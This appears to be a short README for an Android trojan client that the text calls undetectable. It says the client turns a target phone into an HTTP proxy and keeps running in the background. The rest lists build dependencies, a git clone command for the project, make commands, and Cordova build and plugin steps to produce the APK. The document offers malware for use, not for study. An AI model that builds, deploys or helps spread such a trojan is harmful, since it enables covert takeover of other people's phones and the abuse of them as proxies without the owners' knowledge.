This is the android client/trojan, it's undetectable, can turn the target phone to a HTTP proxy and runs in the background permanently without being killed because of battery optimization's restrictions
cordova: 7.0.1
Java JDK: 1.8.0
Android SDK: 29
Android NDK
git clone https://github.com/BenChaliah/Arbitrium-Android --recursive
- Build the binaries:
$ make clean && make build
- Build APK:
$ cd Build_APK && cordova build android
⚠️ if you modify Netbolt-Orange-plugin or Background-mode-plugin you should run the following:
cordova plugin add ../APK_Plugins/cordova-plugin-background-mode
cordova plugin add ../APK_Plugins/netbolt-orange-plugin